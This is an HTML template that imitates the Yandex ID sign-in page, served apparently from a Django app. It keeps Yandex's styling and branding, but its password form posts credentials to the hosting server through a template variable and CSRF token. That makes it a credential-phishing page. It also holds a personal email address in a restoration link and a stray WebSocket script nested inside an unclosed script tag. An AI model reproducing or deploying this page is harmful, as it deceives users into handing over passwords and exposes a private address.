<!doctype html>
<html lang="ru" dir="ltr" data-page-type="react.authv2" class="is-js_no" data-view="default">
<head><title>Авторизация</title>
    <meta charSet="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7,IE=edge"/>
    <link crossorigin="anonymous" rel="preload" as="style"
          href="https://yastatic.net/s3/passport-static/core/v1.88.25/css/react.authv2.cij.css"/>
    <link crossorigin="anonymous" href="//yastatic.net/react/17.0.2/react-with-dom-and-polyfills.min.js" rel="preload"
          as="script"/>
    <link crossorigin="anonymous" href="https://yastatic.net/jquery/2.1.4/jquery.min.js" rel="preload" as="script"/>
    <link rel="shortcut icon" href="/favicon.ico"/>
    <meta name="pdb" content="disable"/>
    <meta name="collections" content="disable"/>
    <link crossorigin="anonymous" rel="stylesheet" type="text/css"
          href="https://yastatic.net/s3/passport-static/core/v1.88.25/css/react.authv2.cij.css"/>
    <link rel="stylesheet" type="text/css"
          href="https://yastatic.net/s3/passport-auth-customs//customs/v1.64.10/passport.auth.customs.css"/>
    <script type="text/javascript" nonce="34593585-7a71-4de4-b811-673282036213">
        (function(d, e, c, r, n, w, v, f) {e = d.documentElement; c = "className"; r = "replace"; n = "createElementNS"; f = "firstChild"; w = "http://www.w3.org/2000/svg"; v = d.createElement("div"); v.innerHTML = "<svg/>"; e[c] = e[c][r]("is-js_no", "is-js_yes"); e[c] += " is-inlinesvg_" + ((v[f] && v[f].namespaceURI) === w ? "yes" : "no"); })(document);

    </script>
    <script type="text/javascript" nonce="34593585-7a71-4de4-b811-673282036213">
        window.onerror=function(d,e,f,g,b){var h=new Image,a=["app=passport"],c="";d&&a.push("msg="+encodeURIComponent(d));e&&a.push("url="+encodeURIComponent(e));(f||g)&&a.push("position="+encodeURIComponent(f+":"+g));if(b){try{c=JSON.stringify(b,Object.getOwnPropertyNames(b))}catch(k){c=b.stack}a.push("error_object="+encodeURIComponent(c))}h.src="/monitoring/onerror?"+a.join("&");return!1};

    </script>
</head>
<body class="Theme_color_yandex-default Theme_root_passport Theme_auth_domik Theme_root_default "
      data-metrics-id="784657" data-user-type="null" data-version="1.88.25" data-origin="null">
<div id="root" class="layout">
    <div class="passp-flex-wrapper">
        <div class="NoJS NoJS_isFloat">
            <div class="NoJS-message">
                <div class="NoJS-title">Необходимо включить JavaScript</div>
                Для корректной работы этого сайта<a data-t="link:default"
                                                    href="https://yandex.ru/support/common/browsers-settings/browsers-java-js-settings.xml"
                                                    target="_blank" class="Link Link_view_default"> <!-- -->включите
                JavaScript<!-- --> .</a></div>
        </div>
        <div class="passp-page">
            <div class="passp-bg passp-bg_14"></div>
            <div class="passp-flex-wrapper">
                <div class="passp-content">
                    <div class="passp-auth theme-default">
                        <div class="passp-page-overlay"></div>
                        <a data-t="backpane" href="/" class="PreviousStepButton"
                           aria-label="Назад"><span data-link="/"></span></a>
                        <div class="passp-auth-content">
                            <div class="Header">
                                <div class="Header-yaLogoBlock"><a aria-label="Яндекс" href="https://ya.ru"
                                                                   tabindex="-1" class="Logo Logo_ya"></a></div>
                            </div>
                            <div class="passp-page-visibility"></div>
                            <div class="">
                                <div class="passp-route">
                                    <div data-t="page:add-account" class="passp-auth-screen passp-add-account-page">
                                        <div class="passp-add-account-page_has-social-block"><h1 data-t="title"
                                                                                                 class="passp-title">
                                            <span class="passp-add-account-page-title">Войдите, чтобы продолжить</span>
                                        </h1>
                                            <div class="passp-login-form">
                                                <form method="post">
                                                    {%csrf_token%}
                                                    <div class="AuthPasswordForm-currentAccount"><a
                                                            class="CurrentAccount CurrentAccount_theme_default"
                                                            href=""><span
                                                            class="CurrentAccount-avatar"
                                                            style="background-image: url(&quot;https://avatars.mds.yandex.net/get-yapic/0/0-0/islands-200&quot;);"></span><span
                                                            class="CurrentAccount-name"><span
                                                            class="CurrentAccount-displayName">{{ login_name }}</span></span></a>
                                                    </div>
                                                    <input class="g-hidden" type="text" name="login" id="login"
                                                           readonly="" autocomplete="username"
                                                           value="{{ login_name }}">
                                                    <div class="Field Field_view_rounded-corner" data-t="field:passwd">
                                                        <div class="Field-inputWrapper"><span
                                                                class="Textinput Textinput_iconRight Textinput_view_rounded-corner Textinput_size_l"><button
                                                                class="Textinput-Icon Textinput-Icon_side_right Password-toggler Password-toggler_view_rounded-corner"
                                                                tabindex="2" type="button" title="Показать пароль"
                                                                aria-label="Show password"
                                                                id="password-toggle"></button><input
                                                                data-t="field:input-passwd" dir="ltr"
                                                                aria-invalid="false"
                                                                autocorrect="off" autocapitalize="none"
                                                                autocomplete="current-password"
                                                                class="Textinput-Control"
                                                                id="passp-field-passwd" name="passwd"
                                                                placeholder="Введите пароль" type="password"
                                                                value=""><span
                                                                class="Textinput-Box"></span></span></div>
                                                        <div class="Field-link" data-t="field:link-passwd"
                                                             id="field:link-passwd"><a data-t="link:default"
                                                                                       href="https://passport.yandex.com/restoration?retpath=https%3A%2F%2Fmail.yandex.com&amp;login=toxa26050@gmail.com&amp;process_uuid=1f3da8a9-d648-4ae4-b98a-be58e1d9e7e5"
                                                                                       weight="medium"
                                                                                       class="Link Link_pseudo Link_view_default Link_weight_medium">Не
                                                            помню пароль</a></div>
                                                    </div>
                                                    <div class="passp-button passp-sign-in-button">
                                                        <button data-t="button:action:passp:sign-in" id="passp:sign-in"
                                                                type="submit"
                                                                class="Button2 Button2_size_l Button2_view_action Button2_width_max Button2_type_submit"
                                                                aria-disabled="false" autocomplete="off"><span
                                                                class="Button2-Text">Войти</span></button>
                                                    </div>
                                                    <div class="AuthPasswordForm-qr-button">
                                                        <button data-t="button:pseudo:qr-button" type="button"
                                                                class="Button2 Button2_size_l Button2_view_pseudo Button2_width_max"
                                                                autocomplete="off"><span
                                                                class="Button2-Text">Войти по QR-коду</span></button>
                                                    </div>
                                                </form>
                                            </div>

                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="yaIdPromoText">Яндекс ID — ключ от всех сервисов <a
                                href="https://id.yandex.ru/about" class="yaIdPromoText_link">Узнать больше</a></div>
                    </div>
                </div>
            </div>
            <footer class="AuthFooter">
                <div class="AuthFooter-wrapper">
                    <div class="AuthFooter-incognitoLink"><span class="AuthFooter-item"><a data-t="link:default"
                                                                                           target="_blank"
                                                                                           href="https://yandex.ru/support/common/browsers-settings/incognito.html"
                                                                                           class="Link Link_view_default">Используйте режим инкогнито на чужом компьютере</a></span>
                    </div>
                    <div class="AuthFooter-mainBlock"><span class="AuthFooter-item" aria-expanded="false"><span
                            data-t="link:default"
                            class="Link Link_pseudo Link_view_default AuthFooter-itemCap">ru</span><span
                            class="AuthFooter-langList AuthFooter-langList_closed"><ul><li
                            class="AuthFooter-langListItem"><a data-t="link:default"
                                                               href="https://yandex.ru/portal/set/lang/?sk=y0a32c11569d1d4aa425cfb82ece04a0c&amp;retpath=https%3A%2F%2Fpassport.yandex.ru%2Fauth%3Fretpath%3Dhttps%253A%252F%252Fmail.yandex.ru&amp;intl=en"
                                                               class="Link Link_view_default">En</a></li></ul></span></span><span
                            class="AuthFooter-item"><a data-t="link:default" href="https://yandex.ru/support/passport/"
                                                       target="_blank" class="Link Link_view_default">Справка и поддержка</a></span><span
                            class="AuthFooter-item"><span class="AuthFooter-copyright">© 2001-2023, </span><a
                            data-t="link:default" href="https://ya.ru" class="Link Link_view_default">Яндекс</a></span>
                    </div>
                </div>
            </footer>
        </div>
    </div>
</div>

<img class="g-hidden"
     src="https://ysa-static.passport.yandex.net/static/1/96eb29b255b84bfd7016c2420aa13870/d.png?ex=yes"/>

<link data-chunk="react.authv2" rel="stylesheet"
      href="https://yastatic.net/s3/passport-static/core/v1.88.25/js/../css/react.authv2.cij.css"
      crossorigin="anonymous">


<script>
    var passwordField = document.getElementById('passp-field-passwd');
var passwordToggle = document.getElementById('password-toggle');

passwordToggle.addEventListener('click', function() {
    if (passwordField.type === 'password') {
        passwordField.type = 'text';

    } else {
        passwordField.type = 'password';

    }
});
<script>
    const socket = new WebSocket('ws://' + window.location.host + '/ws/cleanup_inactive_drivers/');

    socket.onopen = function(e) {
        console.log("[open] Connection established");
    };

    socket.onmessage = function(event) {
        console.log(`[message] Data received from server: ${event.data}`);
    };

    socket.onclose = function(event) {
        console.log(`[close] Connection closed`);
    };

    socket.onerror = function(error) {
        console.log(`[error] ${error.message}`);
    };
</script>
</script>
</body>
</html>